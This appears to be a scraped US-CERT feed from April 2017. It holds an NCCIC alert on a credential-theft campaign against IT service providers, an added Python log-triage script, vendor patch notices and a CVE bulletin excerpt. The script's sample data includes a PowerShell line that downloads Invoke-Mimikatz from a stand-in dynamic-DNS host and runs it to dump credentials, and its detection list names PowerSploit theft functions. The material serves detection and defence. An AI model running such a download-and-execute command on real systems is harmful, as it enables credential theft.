Fri, 28 Apr 2017 02:55:37 +0000
Original release date: April 27, 2017
The Federal Trade Commission (FTC) recommends that consumers who are affected by identity theft file a report at IdentityTheft.gov—a one-stop resource to help you report and recover from identity theft. Information provided there includes checklists, sample letters, and links to other resources.
Thu, 27 Apr 2017 22:50:51 +0000
Original release date: April 27, 2017 | Last revised: April 28, 2017

Systems Affected

Networked Systems

Overview

The National Cybersecurity and Communications Integration Center (NCCIC) has become aware of an emerging sophisticated campaign, occurring since at least May 2016, that uses multiple malware implants. Initial victims have been identified in several sectors, including Information Technology, Energy, Healthcare and Public Health, Communications, and Critical Manufacturing.

According to preliminary analysis, threat actors appear to be leveraging stolen administrative credentials (local and domain) and certificates, along with placing sophisticated malware implants on critical systems. Some of the campaign victims have been IT service providers, where credential compromises could potentially be leveraged to access customer environments. Depending on the defensive mitigations in place, the threat actor could possibly gain full access to networks and data in a way that appears legitimate to existing monitoring tools.

Although this activity is still under investigation, NCCIC is sharing this information to provide organizations information for the detection of potential compromises within their organizations. NCCIC will update this document as information becomes available.

For a downloadable copy of this report and listings of IOCs, see:
Report (.pdf)
IOCs (.xlsx)
IOCs (STIX)

To report activity related to this Incident Report Alert, please contact NCCIC at NCCICCustomerService@hq.dhs.gov or 1-888-282-0870.
Description

Risk Evaluation

NCCIC Cyber Incident Scoring System (NCISS) Rating Priority Level (Color): Yellow (Medium)

A medium priority incident may affect public health or safety, national security, economic security, foreign relations, civil liberties, or public confidence.

Details

While NCCIC continues to work with a variety of victims across different sectors, the adversaries in this campaign continue to affect several IT service providers. To achieve operational efficiencies and effectiveness, many IT service providers leverage common core infrastructure to support multiple clients; that infrastructure should be logically isolated per client. Intrusions into these providers create opportunities for the adversary to leverage stolen credentials to access customer environments within the provider network.

Figure 1: Structure of a traditional business network and an IT service provider network

Technical Analysis

The threat actors in this campaign have been observed employing a variety of tactics, techniques, and procedures (TTPs). The actors use malware implants to acquire legitimate credentials, then leverage those credentials to pivot throughout the local environment. NCCIC is aware of several compromises involving the exploitation of system administrators' credentials to access trusted domains, as well as the malicious use of certificates. Additionally, the adversary makes heavy use of PowerShell and the open source PowerSploit tool to enable assessment, reconnaissance, and lateral movement.

Command and Control (C2) primarily occurs using RC4 cipher communications over port 443 to domains that change IP addresses. Many of these domains spoof legitimate sites and content, with a particular focus on spoofing Windows update sites. Most of the known domains leverage dynamic DNS services, and this pattern adds to the complexity of tracking this activity. Listings of observed domains are found in this document's associated STIX package and .xlsx file.
The indicators should be used to observe potential malicious activity on your network.

User impersonation via compromised credentials is the primary mechanism used by the adversary. However, a secondary technique to maintain persistence and provide additional access into the victim network is the use of malware implants left behind on key relay and staging machines. In some instances, the malware has only been found within memory with no on-disk evidence available for examination. To date, the actors have deployed multiple malware families and variants, some[...]
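The alert describes three things a defender can look for in logs they already collect: outbound 443 connections to dynamic-DNS hosts and Windows-update lookalike domains, destinations on the published IOC list, and PowerSploit function names in PowerShell script block logs. The script below is an added example, not code from the NCCIC alert or its STIX package: it runs that triage over constructed proxy and script-block log lines. The IOC domains, dynamic-DNS suffixes, hostnames and log lines are all constructed for illustration (the real indicator lists are the alert's .xlsx and STIX files); the PowerSploit function names are real names from that open source project, and Event ID 4104 is Windows' script block logging event.

```python
"""Added example (not part of the NCCIC alert): triage constructed proxy and
PowerShell script-block log lines for the C2 and tooling patterns the alert
describes. All hostnames, IPs and log lines here are constructed."""
import re
from collections import Counter

# Constructed stand-in for the alert's IOC list (the real list ships as STIX/.xlsx).
IOC_DOMAINS = {"update-windows-cdn.example", "winupdate-status.example"}

# Constructed dynamic-DNS provider suffixes; replace with your own provider list.
DYNDNS_SUFFIXES = ("ddns.example", "dyn.example", "no-ip.example")

# Function names exported by the open source PowerSploit project (real names).
POWERSPLOIT_FUNCS = ("Invoke-Mimikatz", "Invoke-ReflectivePEInjection",
                     "Get-Keystrokes", "Invoke-WMICommand",
                     "Invoke-TokenManipulation")

# Genuine Microsoft update traffic ends in these zones; any other host whose
# name mentions "windows"+"update" is treated as a lookalike candidate.
LEGIT_UPDATE_SUFFIXES = (".microsoft.com", ".windowsupdate.com")
LOOKALIKE_RE = re.compile(r"win(dows)?[-.]?update|update[-.]?win(dows)?", re.I)

# Constructed proxy log format: <ts> <src-ip> <method> <host>:<port> <status>
PROXY_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\d+\.\d+\.\d+\.\d+) (?P<method>\w+) "
    r"(?P<host>[\w.-]+):(?P<port>\d+) (?P<status>\d+)$"
)


def classify_host(host):
    """Return the list of reasons a destination host is suspicious (empty if none)."""
    host = host.lower().rstrip(".")
    reasons = []
    if host in IOC_DOMAINS:
        reasons.append("ioc-match")
    if any(host.endswith("." + s) for s in DYNDNS_SUFFIXES):
        reasons.append("dynamic-dns")
    if LOOKALIKE_RE.search(host) and not host.endswith(LEGIT_UPDATE_SUFFIXES):
        reasons.append("windows-update-lookalike")
    return reasons


def scan_proxy_log(lines):
    """Flag port-443 connections (the alert's C2 port) to suspicious hosts."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line.strip())
        if not m or m["port"] != "443":
            continue
        reasons = classify_host(m["host"])
        if reasons:
            hits.append((m["src"], m["host"], reasons))
    return hits


def scan_powershell_log(blocks):
    """Return (block_id, function) pairs where a PowerSploit function name
    appears; blocks are (id, script_text) pairs as pulled from Event ID 4104."""
    hits = []
    for block_id, text in blocks:
        lowered = text.lower()
        for fn in POWERSPLOIT_FUNCS:
            if fn.lower() in lowered:
                hits.append((block_id, fn))
    return hits


def summarize(hits):
    """Count flagged connections per internal source address for follow-up."""
    return Counter(src for src, _host, _reasons in hits)


# Constructed sample input: one legitimate update host, two IOC hits, one
# dynamic-DNS host, and one plain-HTTP intranet request that must be ignored.
SAMPLE_PROXY = """\
2017-04-20T10:01:02Z 10.0.0.5 CONNECT download.windowsupdate.com:443 200
2017-04-20T10:01:07Z 10.0.0.5 CONNECT update-windows-cdn.example:443 200
2017-04-20T10:02:11Z 10.0.0.9 CONNECT host7.ddns.example:443 200
2017-04-20T10:02:40Z 10.0.0.9 GET intranet.corp.example:80 200
2017-04-20T10:03:15Z 10.0.0.12 CONNECT winupdate-status.example:443 200
""".splitlines()

SAMPLE_PS = [
    ("b1", "Get-ChildItem C:\\Users | Sort-Object LastWriteTime"),
    ("b2", "IEX (New-Object Net.WebClient).DownloadString("
           "'https://host7.ddns.example/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"),
]

if __name__ == "__main__":
    for src, host, reasons in scan_proxy_log(SAMPLE_PROXY):
        print(f"{src} -> {host}: {', '.join(reasons)}")
    print("per-source:", dict(summarize(scan_proxy_log(SAMPLE_PROXY))))
    print("powersploit:", scan_powershell_log(SAMPLE_PS))
```

Two caveats from the alert itself apply when running this for real. The domain list changes IP addresses and uses dynamic DNS, so match on the hostname (proxy log, DNS log or TLS SNI), not on resolved IPs. And because the actor's primary access is legitimate-looking credential use, a proxy hit is a starting point for pulling that host's logon and PowerShell history, not a verdict on its own; hosts where the implant is memory-only will show nothing on disk, so memory capture should be part of the follow-up.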
Wed, 26 Apr 2017 13:03:54 +0000
Original release date: April 26, 2017
Users and administrators are encouraged to review Adobe Security Bulletin APSB17-14 and apply the necessary updates.
Tue, 25 Apr 2017 22:15:30 +0000
Original release date: April 25, 2017
Applications developed using the Portrait Displays software development kit (SDK), versions 2.30 through 2.34, contain a critical vulnerability. A local attacker could exploit this vulnerability to take control of an affected system.
The affected applications, pre-installed on some Fujitsu, HP, and Philips devices, are:
US-CERT recommends users and administrators review Vulnerability Note VU#219739 for additional information and refer to their device vendors for appropriate patches. Portrait Displays has released a patch for its SDK software.
Tue, 25 Apr 2017 12:47:59 +0000
Original release date: April 25, 2017
IBM has released a security update to address a vulnerability in the IBM Domino server's handling of the IMAP EXAMINE command. An attacker could exploit this vulnerability to take control of an affected system.
Available updates include:
Mon, 24 Apr 2017 12:11:53 +0000
Original release date: April 24, 2017

The US-CERT Cyber Security Bulletin provides a summary of new vulnerabilities that have been recorded by the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD) in the past week. The NVD is sponsored by the Department of Homeland Security (DHS) National Cybersecurity and Communications Integration Center (NCCIC) / United States Computer Emergency Readiness Team (US-CERT). For modified or updated entries, please visit the NVD, which contains historical vulnerability information.

The vulnerabilities are based on the CVE vulnerability naming standard and are organized according to severity, determined by the Common Vulnerability Scoring System (CVSS) standard. The division of high, medium, and low severities corresponds to the following scores:
High - Vulnerabilities will be labeled High severity if they have a CVSS base score of 7.0 - 10.0
Medium - Vulnerabilities will be labeled Medium severity if they have a CVSS base score of 4.0 - 6.9
Low - Vulnerabilities will be labeled Low severity if they have a CVSS base score of 0.0 - 3.9

Entries may include additional information provided by organizations and efforts sponsored by US-CERT. This information may include identifying information, values, definitions, and related links. Patch information is provided when available. Please note that some of the information in the bulletins is compiled from external, open source reports and is not a direct result of US-CERT analysis.

High Vulnerabilities

Primary Vendor -- Product | Description | Published | CVSS Score | Source & Patch Info
apache -- tomcat | In Apache Tomcat 9.0.0.M1 to 9.0.0.M18 and 8.5.0 to 8.5.12, the refactoring of the HTTP connectors introduced a regression in the send file processing. If the send file processing completed quickly, it was possible for the Processor to be added to the processor cache twice. This could result in the same Processor being used for multiple requests, which in turn could lead to unexpected errors and/or response mix-up. | 2017-04-17 | 7.5 | CVE-2017-5651 (BID, CONFIRM, MLIST)
apache -- traffic_server | Apache Traffic Server 6.0.0 to 6.2.0 are affected by an HPACK Bomb Attack. | 2017-04-17 | 7.8 | CVE-2016-5396 (CONFIRM)
canonical -- ubuntu_linux | The crontab script in the ntp package before 1:4.2.6.p3+dfsg-1ubuntu3.11 on Ubuntu 12.04 LTS, before 1:4.2.6.p5+dfsg-3ubuntu2.14.04.10 on Ubuntu 14.04 LTS, on Ubuntu Wily, and before 1:4.2.8p4+dfsg-3ubuntu5.3 on Ubuntu 16.04 LTS allows local users with access to the ntp account to write to arbitrary files and consequently gain privileges via vectors involving statistics directory cleanup. | 2017-04-14 | 7.2 | CVE-2016-0727 (MISC, BID, SECTRACK, UBUNTU, CONFIRM, CONFIRM)
ffmpeg -- ffmpeg | FFmpeg before 2017-03-05 has an out-of-bounds write caused by a heap-based buffer overflow related to the ff_h264_slice_context_init function in libavcodec/h264dec.c. | 2017-04-14 | 7.5 | CVE-2017-7859 (BID, MISC)
ffmpeg -- ffmpeg | FFmpeg before 2017-02-07 has an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame function in libavcodec/pictordec.c. | 2017-04-14 | 7.5 | CVE-2017-7862 (BID, MISC, MISC)
ffmpeg -- ffmpeg | FFmpeg before 2017-02-04 has an out-of-bounds write caused by a heap-based buffer overflow related to the decode_frame_common function in libavcodec/pngdec.c. | 2017-04-14 | 7.5 | CVE-2017-7863 (BID, MISC, MISC)
ffmpeg -- ffmpeg | FFmpeg before 2017-01-24 has an out-of-bounds write caused by a heap-based buffer overflow related to the ipvideo_decode_block_opcode_0xA function in libavcodec/interplayvideo.c and the avcodec_align_dimensions2 function in libavcodec/utils.c. | 2017-04-14 | 7.5 | CVE-2017-7865 (BID, MISC, MISC)
ffmpeg -- ffmpeg | FFmpeg before 2017-01-23 has an out-of-bounds write caused by a stack-based buffer overflow related to the decode_zbuf function in libavcodec/pngdec.c. | 2017-04-14 | 7.5 | CVE-2017-7866 (BID, MISC, MISC)
flatcore -- flatcore-cms | SQL Injection vulnerability in flatCore version 1.4.6 allows an attacker to read and write to the [...] | | |
Thu, 20 Apr 2017 00:17:53 +0000
Original release date: April 19, 2017
Drupal has released an advisory to address a vulnerability in Drupal core 8.x versions prior to 8.2.8 and 8.3.1. A remote attacker could exploit this vulnerability to obtain sensitive information.
Thu, 20 Apr 2017 00:14:27 +0000
Original release date: April 19, 2017
Cisco has released updates to address several high-impact vulnerabilities affecting multiple products. These and other lower-impact vulnerabilities are listed at Cisco Security Advisories and Alerts. A remote attacker could exploit one of the high-impact vulnerabilities to cause a denial-of-service condition.
Users and administrators are encouraged to review the following Cisco Security Advisories and apply the necessary updates:
Thu, 20 Apr 2017 00:04:38 +0000
Original release date: April 19, 2017
Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system.
Thu, 20 Apr 2017 00:02:20 +0000
Original release date: April 19, 2017
Google has released Chrome version 58.0.3029.81 for Windows, Mac, and Linux. This version addresses multiple vulnerabilities that an attacker may exploit to take control of an affected system.
Users and administrators are encouraged to review the Chrome Releases page and apply the necessary updates.